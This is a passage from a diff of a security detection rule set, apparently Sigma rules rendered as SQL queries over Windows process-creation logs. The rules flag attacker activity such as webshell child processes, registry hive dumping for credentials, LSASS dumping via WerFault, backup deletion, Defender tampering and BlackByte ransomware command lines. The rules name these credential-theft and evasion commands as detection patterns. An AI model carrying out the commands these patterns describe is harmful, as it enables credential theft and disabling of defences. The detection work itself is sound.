'%\\\\findstr.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hostname.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netdom.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_exploit_cve_2020_1350.yml" + "filename": "proc_creation_win_webshell_spawn.yml" }, { - "title": "Renamed Jusched.EXE Execution", - "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", - "status": "test", - "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", - "author": "Markus Neis, Swisscom", + "title": "Suspicious Parent Double Extension File Execution", + "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "status": "experimental", + "description": "Detect execution of suspicious double extension files in ParentCommandLine", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1036.003" + "attack.t1036.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (NewProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%.doc.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.doc.js' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.js' ESCAPE 
'\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_jusched.yml" + "filename": "proc_creation_win_susp_double_extension_parent.yml" }, { - "title": "Filter Driver Unloaded Via Fltmc.EXE", - "id": "4931188c-178e-4ee7-a348-39e8a7a56821", - "status": "test", - "description": "Detect filter driver unloading activity via fltmc.exe", - "author": "Nasreddine Bencherchali", + "title": "Potential Privilege Escalation To LOCAL SYSTEM", + "id": "207b0396-3689-42d9-8399-4222658efc99", + "status": "experimental", + "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less 
embarrassing" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE 
'%accepteula%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fltmc_unload_driver.yml" + "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" }, { - "title": "WhoAmI as Parameter", - "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "title": "Renamed Jusched.EXE Execution", + "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "status": "test", - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", + "author": "Markus Neis, Swisscom", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (NewProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_whoami_as_param.yml" + "filename": "proc_creation_win_renamed_jusched.yml" }, { - "title": "Potential Credential Dumping Via WER", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", - "status": "experimental", - "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", - "author": "@pbssubhash , Nasreddine Bencherchali", + "title": "SystemStateBackup Deleted Using Wbadmin.EXE", + "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "status": "test", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have 
Windows Backup enabled.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" + "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" }, { - "title": "Suspicious Reg Add BitLocker", - "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "title": "HackTool - Stracciatella Execution", + "id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "status": "experimental", - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", - "author": "frack113", + "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - 
"attack.impact", - "attack.t1486" + "attack.execution", + "attack.defense_evasion", + "attack.t1059", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Stracciatella.exe' ESCAPE '\\' OR OriginalFileName = 'Stracciatella.exe' OR Description = 'Stracciatella' OR (Hashes LIKE '%SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a%' ESCAPE '\\') OR sha256 IN ('9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956', 'fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a')))" ], - "filename": "proc_creation_win_reg_bitlocker.yml" + "filename": "proc_creation_win_hktl_stracciatella_execution.yml" }, { - "title": "Unusual Child Process of dns.exe", - "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "title": "PUA - Wsudo Suspicious Execution", + "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "status": "experimental", - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as 
seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch", + "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentProcessName LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dns_susp_child_process.yml" + "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" }, { - "title": "Potential BlackByte Ransomware Activity", - "id": "999e8307-a775-4d5f-addc-4855632335be", + "title": "Dumping of Sensitive Hives Via Reg.EXE", + "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", "status": "test", - "description": "Detects command line patterns used by BlackByte ransomware in different operations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "tags": [ + "attack.credential_access", + 
"attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ], "falsepositives": [ - "Unknown" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" + "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" }, { - "title": "Suspicious HWP Sub Processes", - 
"id": "023394c4-29d5-46ab-92b8-6a534c6f447b", - "status": "test", - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "title": "Suspicious Obfuscated PowerShell Code", + "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "status": "experimental", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\gbb.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' 
ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hwp_exploits.yml" + "filename": "proc_creation_win_powershell_encoded_obfusc.yml" }, { - "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", - "status": "test", - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "Wab Execution From Non Default Location", + "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "status": "experimental", + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE 
'%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" + "attack.defense_evasion", + "attack.execution" ], - "filename": "proc_creation_win_schtasks_reg_loader.yml" - }, - { - "title": "HackTool - PCHunter Execution", - "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "status": "experimental", - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" + "SELECT * FROM logs WHERE 
((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_pchunter.yml" + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" }, { - "title": "Taskkill Symantec Endpoint Protection", - "id": "4a6713f6-3331-11ed-a261-0242ac120002", + "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", + "id": "452bce90-6fb0-43cc-97a5-affc283139b3", "status": "experimental", - "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate use by administrators to test software (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID 
